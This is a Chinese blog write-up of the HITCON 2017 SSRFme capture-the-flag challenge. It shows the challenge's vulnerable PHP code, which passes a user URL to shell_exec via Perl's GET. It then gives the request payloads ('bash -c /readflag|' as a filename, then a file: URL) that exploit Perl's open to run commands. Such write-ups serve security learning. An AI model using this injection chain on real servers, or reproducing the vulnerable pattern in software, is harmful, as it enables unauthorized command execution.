[HITCON 2017]SSRFme

最新推荐文章于 2025-03-30 18:43:04 发布
最新推荐文章于 2025-03-30 18:43:04 发布
阅读量212 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Yb_140/article/details/127971107
版权

给了源码

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];//输出ip地址

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);//创建文件夹
    @chdir($sandbox);//改变目录至改目录下

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);//pathinfo()函数
    $dir  = str_replace(".", "", basename($info["dirname"]));//目录路径
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);//文件名
    highlight_file(__FILE__);

这里会将orange和ip地址进行拼接,然后md5加密,创建该文件夹。

需要注意shell_exec("GET " . escapeshellarg($_GET["url"]))存在命令执行,前提是文件名可控,且文件必须存在,然后才能触发代码执行

perl脚本中GET命令执行漏洞([HITCON 2017]SSRFme)_WHOAMIAnony的博客-优快云博客 

首先查看下根目录文件

?url=/&filename=a

创建后,访问

/sandbox/xxxxxxxxxxxxxxxxx/a

其中xxxxxxxxxxxxxxxxx每个人都不同,这里只是代称,可以通过本地运行得到

<?php
$a = "111.111.111.111";//举例
$sandbox = "sandbox/" . md5("orange" . $a);
echo $sandbox;//输出xxxxxxxxxxxxxxxxxxx

 

可以看到有个readflag

先创建文件bash -c /readflag|

?url=&filename=bash -c /readflag|

创建文件后,再通过file协议,将读取的flag放入$data中,通过file_put_contents导入a中,然后访问a即可

?url=file:bash -c /readflag|&filename=a
/sandbox/xxxxxxxxxxxxxxxx/a

 

BUUCTF_Web([HITCON 2017]SSRFme1)SSRF/代码审计
2401_87524087的博客
01-23 1153
输出IP地址,将orange和ip地址进行拼接,然后md5加密,在 sandbox/ 目录下创建以该哈希值命名的目录,并切换目录,保存数据。
[BUUCTF][HITCON 2017]SSRFme
Y4tacker的博客
10-03 6140
文章目录知识点新学会的函数代码审计 知识点 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 新学会的函数 pathinfo 代码审计 前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行, 命令执行的结果会被存入我们以filename参数的值命名的文件里 <?php if (isset
web-ssrfme 复现 2月公开赛 -redis 未授权访问攻击
最新发布
a1852384503的博客
03-30 367
首先自己部署在虚拟机上部署号靶机环境打开网页。
hitcon_2017_ssrfme
o3Ev的博客
05-02 444
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
[HITCON 2017]SSRFme 1
03-30
### HITCON 2017 SSRF Challenge Overview The **HITCON 2017 CTF** featured a variety of challenges, including those related to Server-Side Request Forgery (SSRF). These challenges were designed to test...
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值